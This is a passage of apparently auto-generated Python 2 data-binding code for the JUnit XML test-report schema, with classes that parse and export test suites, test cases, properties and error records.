TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace,name)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (self.name, self.value, self.name))
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s", "%s"),\n' % \
(self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class testsuites(GeneratedsSuper):
"""Contains an aggregation of testsuite results"""
subclass = None
superclass = None
def __init__(self, testsuite=None):
if testsuite is None:
self.testsuite = []
else:
self.testsuite = testsuite
def factory(*args_, **kwargs_):
if testsuites.subclass:
return testsuites.subclass(*args_, **kwargs_)
else:
return testsuites(*args_, **kwargs_)
factory = staticmethod(factory)
def get_testsuite(self): return self.testsuite
def set_testsuite(self, testsuite): self.testsuite = testsuite
def add_testsuite(self, value): self.testsuite.append(value)
def insert_testsuite(self, index, value): self.testsuite[index] = value
def export(self, outfile, level, namespace_='', name_='testsuites', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testsuites')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testsuites'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='testsuites', fromsubclass_=False):
for testsuite_ in self.testsuite:
testsuite_.export(outfile, level, namespace_, name_='testsuite')
def hasContent_(self):
if (
self.testsuite
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testsuites'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('testsuite=[\n')
level += 1
for testsuite_ in self.testsuite:
showIndent(outfile, level)
outfile.write('model_.testsuiteType(\n')
testsuite_.exportLiteral(outfile, level, name_='testsuiteType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'testsuite':
obj_ = testsuiteType.factory()
obj_.build(child_)
self.testsuite.append(obj_)
# end class testsuites
class testsuite(GeneratedsSuper):
"""Contains the results of exexuting a testsuiteFull class name of the
test for non-aggregated testsuite documents. Class name without
the package for aggregated testsuites documentswhen the test was
executed. Timezone may not be specified.Host on which the tests
were executed. 'localhost' should be used if the hostname cannot
be determined.The total number of tests in the suiteThe total
number of tests in the suite that failed. A failure is a test
which the code has explicitly failed by using the mechanisms for
that purpose. e.g., via an assertEqualsThe total number of tests
in the suite that errorrd. An errored test is one that had an
unanticipated problem. e.g., an unchecked throwable; or a
problem with the implementation of the test.Time taken (in
seconds) to execute the tests in the suite"""
subclass = None
superclass = None
def __init__(self, tests=None, errors=None, name=None, timestamp=None, hostname=None, time=None, failures=None, properties=None, testcase=None, system_out=None, system_err=None, extensiontype_=None):
self.tests = _cast(int, tests)
self.errors = _cast(int, errors)
self.name = _cast(None, name)
self.timestamp = _cast(None, timestamp)
self.hostname = _cast(None, hostname)
self.time = _cast(float, time)
self.failures = _cast(int, failures)
self.properties = properties
if testcase is None:
self.testcase = []
else:
self.testcase = testcase
self.system_out = system_out
self.system_err = system_err
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if testsuite.subclass:
return testsuite.subclass(*args_, **kwargs_)
else:
return testsuite(*args_, **kwargs_)
factory = staticmethod(factory)
def get_properties(self): return self.properties
def set_properties(self, properties): self.properties = properties
def get_testcase(self): return self.testcase
def set_testcase(self, testcase): self.testcase = testcase
def add_testcase(self, value): self.testcase.append(value)
def insert_testcase(self, index, value): self.testcase[index] = value
def get_system_out(self): return self.system_out
def set_system_out(self, system_out): self.system_out = system_out
def get_system_err(self): return self.system_err
def set_system_err(self, system_err): self.system_err = system_err
def get_tests(self): return self.tests
def set_tests(self, tests): self.tests = tests
def get_errors(self): return self.errors
def set_errors(self, errors): self.errors = errors
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_timestamp(self): return self.timestamp
def set_timestamp(self, timestamp): self.timestamp = timestamp
def validate_ISO8601_DATETIME_PATTERN(self, value):
# Validate type ISO8601_DATETIME_PATTERN, a restriction on xs:dateTime.
pass
def get_hostname(self): return self.hostname
def set_hostname(self, hostname): self.hostname = hostname
def get_time(self): return self.time
def set_time(self, time): self.time = time
def get_failures(self): return self.failures
def set_failures(self, failures): self.failures = failures
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def export(self, outfile, level, namespace_='', name_='testsuite', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testsuite')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testsuite'):
if self.tests is not None and 'tests' not in already_processed:
already_processed.append('tests')
outfile.write(' tests="%s"' % self.gds_format_integer(self.tests, input_name='tests'))
if self.errors is not None and 'errors' not in already_processed:
already_processed.append('errors')
outfile.write(' errors="%s"' % self.gds_format_integer(self.errors, input_name='errors'))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), ))
if self.timestamp is not None and 'timestamp' not in already_processed:
already_processed.append('timestamp')
outfile.write(' timestamp=%s' % (quote_attrib(self.timestamp), ))
if self.hostname is not None and 'hostname' not in already_processed:
already_processed.append('hostname')
outfile.write(' hostname=%s' % (self.gds_format_string(quote_attrib(self.hostname).encode(ExternalEncoding), input_name='hostname'), ))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
outfile.write(' time="%s"' % self.gds_format_float(self.time, input_name='time'))
if self.failures is not None and 'failures' not in already_processed:
already_processed.append('failures')
outfile.write(' failures="%s"' % self.gds_format_integer(self.failures, input_name='failures'))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.append('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='', name_='testsuite', fromsubclass_=False):
if self.properties is not None:
self.properties.export(outfile, level, namespace_, name_='properties', )
for testcase_ in self.testcase:
testcase_.export(outfile, level, namespace_, name_='testcase')
if self.system_out is not None:
showIndent(outfile, level)
outfile.write('<%ssystem-out>%s</%ssystem-out>\n' % (namespace_, self.gds_format_string(quote_xml(self.system_out).encode(ExternalEncoding), input_name='system-out'), namespace_))
if self.system_err is not None:
showIndent(outfile, level)
outfile.write('<%ssystem-err>%s</%ssystem-err>\n' % (namespace_, self.gds_format_string(quote_xml(self.system_err).encode(ExternalEncoding), input_name='system-err'), namespace_))
def hasContent_(self):
if (
self.properties is not None or
self.testcase or
self.system_out is not None or
self.system_err is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testsuite'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.tests is not None and 'tests' not in already_processed:
already_processed.append('tests')
showIndent(outfile, level)
outfile.write('tests = %d,\n' % (self.tests,))
if self.errors is not None and 'errors' not in already_processed:
already_processed.append('errors')
showIndent(outfile, level)
outfile.write('errors = %d,\n' % (self.errors,))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
showIndent(outfile, level)
outfile.write('name = "%s",\n' % (self.name,))
if self.timestamp is not None and 'timestamp' not in already_processed:
already_processed.append('timestamp')
showIndent(outfile, level)
outfile.write('timestamp = "%s",\n' % (self.timestamp,))
if self.hostname is not None and 'hostname' not in already_processed:
already_processed.append('hostname')
showIndent(outfile, level)
outfile.write('hostname = "%s",\n' % (self.hostname,))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
showIndent(outfile, level)
outfile.write('time = %f,\n' % (self.time,))
if self.failures is not None and 'failures' not in already_processed:
already_processed.append('failures')
showIndent(outfile, level)
outfile.write('failures = %d,\n' % (self.failures,))
def exportLiteralChildren(self, outfile, level, name_):
if self.properties is not None:
showIndent(outfile, level)
outfile.write('properties=model_.propertiesType(\n')
self.properties.exportLiteral(outfile, level, name_='properties')
showIndent(outfile, level)
outfile.write('),\n')
showIndent(outfile, level)
outfile.write('testcase=[\n')
level += 1
for testcase_ in self.testcase:
showIndent(outfile, level)
outfile.write('model_.testcaseType(\n')
testcase_.exportLiteral(outfile, level, name_='testcaseType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
if self.system_out is not None:
showIndent(outfile, level)
outfile.write('system_out=%s,\n' % quote_python(self.system_out).encode(ExternalEncoding))
if self.system_err is not None:
showIndent(outfile, level)
outfile.write('system_err=%s,\n' % quote_python(self.system_err).encode(ExternalEncoding))
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('tests', node)
if value is not None and 'tests' not in already_processed:
already_processed.append('tests')
try:
self.tests = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('errors', node)
if value is not None and 'errors' not in already_processed:
already_processed.append('errors')
try:
self.errors = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.append('name')
self.name = value
self.name = ' '.join(self.name.split())
value = find_attr_value_('timestamp', node)
if value is not None and 'timestamp' not in already_processed:
already_processed.append('timestamp')
self.timestamp = value
self.validate_ISO8601_DATETIME_PATTERN(self.timestamp) # validate type ISO8601_DATETIME_PATTERN
value = find_attr_value_('hostname', node)
if value is not None and 'hostname' not in already_processed:
already_processed.append('hostname')
self.hostname = value
self.hostname = ' '.join(self.hostname.split())
value = find_attr_value_('time', node)
if value is not None and 'time' not in already_processed:
already_processed.append('time')
try:
self.time = float(value)
except ValueError, exp:
raise ValueError('Bad float/double attribute (time): %s' % exp)
value = find_attr_value_('failures', node)
if value is not None and 'failures' not in already_processed:
already_processed.append('failures')
try:
self.failures = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.append('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'properties':
obj_ = propertiesType.factory()
obj_.build(child_)
self.set_properties(obj_)
elif nodeName_ == 'testcase':
obj_ = testcaseType.factory()
obj_.build(child_)
self.testcase.append(obj_)
elif nodeName_ == 'system-out':
system_out_ = child_.text
system_out_ = self.gds_validate_string(system_out_, node, 'system_out')
self.system_out = system_out_
elif nodeName_ == 'system-err':
system_err_ = child_.text
system_err_ = self.gds_validate_string(system_err_, node, 'system_err')
self.system_err = system_err_
# end class testsuite
class system_out(GeneratedsSuper):
"""Data that was written to standard out while the test was executed"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if system_out.subclass:
return system_out.subclass(*args_, **kwargs_)
else:
return system_out(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='system-out', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='system-out')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='system-out'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='system-out', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='system-out'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class system_out
class system_err(GeneratedsSuper):
"""Data that was written to standard error while the test was executed"""
subclass = None
superclass = None
def __init__(self):
pass
def factory(*args_, **kwargs_):
if system_err.subclass:
return system_err.subclass(*args_, **kwargs_)
else:
return system_err(*args_, **kwargs_)
factory = staticmethod(factory)
def export(self, outfile, level, namespace_='', name_='system-err', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='system-err')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='system-err'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='system-err', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='system-err'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class system_err
class testsuiteType(testsuite):
"""Derived from testsuite/@name in the non-aggregated documentsStarts
at '0' for the first testsuite and is incremented by 1 for each
following testsuite"""
subclass = None
superclass = testsuite
def __init__(self, tests=None, errors=None, name=None, timestamp=None, hostname=None, time=None, failures=None, properties=None, testcase=None, system_out=None, system_err=None, id=None, package=None):
super(testsuiteType, self).__init__(tests, errors, name, timestamp, hostname, time, failures, properties, testcase, system_out, system_err, )
self.id = _cast(int, id)
self.package = _cast(None, package)
pass
def factory(*args_, **kwargs_):
if testsuiteType.subclass:
return testsuiteType.subclass(*args_, **kwargs_)
else:
return testsuiteType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_package(self): return self.package
def set_package(self, package): self.package = package
def export(self, outfile, level, namespace_='', name_='testsuiteType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testsuiteType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testsuiteType'):
super(testsuiteType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='testsuiteType')
if self.id is not None and 'id' not in already_processed:
already_processed.append('id')
outfile.write(' id="%s"' % self.gds_format_integer(self.id, input_name='id'))
if self.package is not None and 'package' not in already_processed:
already_processed.append('package')
outfile.write(' package=%s' % (self.gds_format_string(quote_attrib(self.package).encode(ExternalEncoding), input_name='package'), ))
def exportChildren(self, outfile, level, namespace_='', name_='testsuiteType', fromsubclass_=False):
super(testsuiteType, self).exportChildren(outfile, level, namespace_, name_, True)
def hasContent_(self):
if (
super(testsuiteType, self).hasContent_()
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testsuiteType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.id is not None and 'id' not in already_processed:
already_processed.append('id')
showIndent(outfile, level)
outfile.write('id = %d,\n' % (self.id,))
if self.package is not None and 'package' not in already_processed:
already_processed.append('package')
showIndent(outfile, level)
outfile.write('package = "%s",\n' % (self.package,))
super(testsuiteType, self).exportLiteralAttributes(outfile, level, already_processed, name_)
def exportLiteralChildren(self, outfile, level, name_):
super(testsuiteType, self).exportLiteralChildren(outfile, level, name_)
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.append('id')
try:
self.id = int(value)
except ValueError, exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
value = find_attr_value_('package', node)
if value is not None and 'package' not in already_processed:
already_processed.append('package')
self.package = value
self.package = ' '.join(self.package.split())
super(testsuiteType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(testsuiteType, self).buildChildren(child_, node, nodeName_, True)
pass
# end class testsuiteType
class propertiesType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, property=None):
if property is None:
self.property = []
else:
self.property = property
def factory(*args_, **kwargs_):
if propertiesType.subclass:
return propertiesType.subclass(*args_, **kwargs_)
else:
return propertiesType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_property(self): return self.property
def set_property(self, property): self.property = property
def add_property(self, value): self.property.append(value)
def insert_property(self, index, value): self.property[index] = value
def export(self, outfile, level, namespace_='', name_='propertiesType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='propertiesType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='propertiesType'):
pass
def exportChildren(self, outfile, level, namespace_='', name_='propertiesType', fromsubclass_=False):
for property_ in self.property:
property_.export(outfile, level, namespace_, name_='property')
def hasContent_(self):
if (
self.property
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='propertiesType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('property=[\n')
level += 1
for property_ in self.property:
showIndent(outfile, level)
outfile.write('model_.propertyType(\n')
property_.exportLiteral(outfile, level, name_='propertyType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'property':
obj_ = propertyType.factory()
obj_.build(child_)
self.property.append(obj_)
# end class propertiesType
class propertyType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, name=None, value=None):
self.name = _cast(None, name)
self.value = _cast(None, value)
pass
def factory(*args_, **kwargs_):
if propertyType.subclass:
return propertyType.subclass(*args_, **kwargs_)
else:
return propertyType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_value(self): return self.value
def set_value(self, value): self.value = value
def export(self, outfile, level, namespace_='', name_='propertyType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='propertyType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='propertyType'):
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), ))
if self.value is not None and 'value' not in already_processed:
already_processed.append('value')
outfile.write(' value=%s' % (self.gds_format_string(quote_attrib(self.value).encode(ExternalEncoding), input_name='value'), ))
def exportChildren(self, outfile, level, namespace_='', name_='propertyType', fromsubclass_=False):
pass
def hasContent_(self):
if (
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='propertyType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
showIndent(outfile, level)
outfile.write('name = "%s",\n' % (self.name,))
if self.value is not None and 'value' not in already_processed:
already_processed.append('value')
showIndent(outfile, level)
outfile.write('value = "%s",\n' % (self.value,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.append('name')
self.name = value
self.name = ' '.join(self.name.split())
value = find_attr_value_('value', node)
if value is not None and 'value' not in already_processed:
already_processed.append('value')
self.value = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class propertyType
class testcaseType(GeneratedsSuper):
"""Name of the test methodFull class name for the class the test method
is in.Time taken (in seconds) to execute the test"""
subclass = None
superclass = None
def __init__(self, classname=None, name=None, time=None, error=None, failure=None):
self.classname = _cast(None, classname)
self.name = _cast(None, name)
self.time = _cast(float, time)
self.error = error
self.failure = failure
def factory(*args_, **kwargs_):
if testcaseType.subclass:
return testcaseType.subclass(*args_, **kwargs_)
else:
return testcaseType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_error(self): return self.error
def set_error(self, error): self.error = error
def get_failure(self): return self.failure
def set_failure(self, failure): self.failure = failure
def get_classname(self): return self.classname
def set_classname(self, classname): self.classname = classname
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_time(self): return self.time
def set_time(self, time): self.time = time
def export(self, outfile, level, namespace_='', name_='testcaseType', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='testcaseType')
if self.hasContent_():
outfile.write('>\n')
self.exportChildren(outfile, level + 1, namespace_, name_)
showIndent(outfile, level)
outfile.write('</%s%s>\n' % (namespace_, name_))
else:
outfile.write('/>\n')
def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='testcaseType'):
if self.classname is not None and 'classname' not in already_processed:
already_processed.append('classname')
outfile.write(' classname=%s' % (self.gds_format_string(quote_attrib(self.classname).encode(ExternalEncoding), input_name='classname'), ))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
outfile.write(' name=%s' % (self.gds_format_string(quote_attrib(self.name).encode(ExternalEncoding), input_name='name'), ))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
outfile.write(' time="%s"' % self.gds_format_float(self.time, input_name='time'))
def exportChildren(self, outfile, level, namespace_='', name_='testcaseType', fromsubclass_=False):
if self.error is not None:
self.error.export(outfile, level, namespace_, name_='error')
if self.failure is not None:
self.failure.export(outfile, level, namespace_, name_='failure')
def hasContent_(self):
if (
self.error is not None or
self.failure is not None
):
return True
else:
return False
def exportLiteral(self, outfile, level, name_='testcaseType'):
level += 1
self.exportLiteralAttributes(outfile, level, [], name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.classname is not None and 'classname' not in already_processed:
already_processed.append('classname')
showIndent(outfile, level)
outfile.write('classname = "%s",\n' % (self.classname,))
if self.name is not None and 'name' not in already_processed:
already_processed.append('name')
showIndent(outfile, level)
outfile.write('name = "%s",\n' % (self.name,))
if self.time is not None and 'time' not in already_processed:
already_processed.append('time')
showIndent(outfile, level)
outfile.write('time = %f,\n' % (self.time,))
def exportLiteralChildren(self, outfile, level, name_):
if self.error is not None:
showIndent(outfile, level)
outfile.write('error=model_.errorType(\n')
self.error.exportLiteral(outfile, level, name_='error')
showIndent(outfile, level)
outfile.write('),\n')
if self.failure is not None:
showIndent(outfile, level)
outfile.write('failure=model_.failureType(\n')
self.failure.exportLiteral(outfile, level, name_='failure')
showIndent(outfile, level)
outfile.write('),\n')
def build(self, node):
self.buildAttributes(node, node.attrib, [])
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('classname', node)
if value is not None and 'classname' not in already_processed:
already_processed.append('classname')
self.classname = value
self.classname = ' '.join(self.classname.split())
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.append('name')
self.name = value
self.name = ' '.join(self.name.split())
value = find_attr_value_('time', node)
if value is not None and 'time' not in already_processed:
already_processed.append('time')
try:
self.time = float(value)
except ValueError, exp:
raise ValueError('Bad float/double attribute (time): %s' % exp)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'error':
obj_ = errorType.factory()
obj_.build(child_)
self.set_error(obj_)
elif nodeName_ == 'failure':
obj_ = failureType.factory()
obj_.build(child_)
self.set_failure(obj_)
# end class testcaseType
class errorType(GeneratedsSuper):
"""The error message. e.g., if a java exception is thrown, the return
value of getMessage()The type of error that occured. e.g., if a
java execption is thrown the full class name of the exception."""
subclass = None
superclass = None
def __init__(self, message=None, type_=None, valueOf_=None):
self.message = _cast(None, message)
self.type_ = _cast(None, type_)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if errorType.subclass:
return errorType.subclass(*args_, **kwargs_)
else:
return errorType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_message(self): return self.message
def set_message(self, message): self.message = message
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def export(self, outfile, level, namespace_='', name_='errorType', namespacedef_=''):
showIndent(outfile, level)
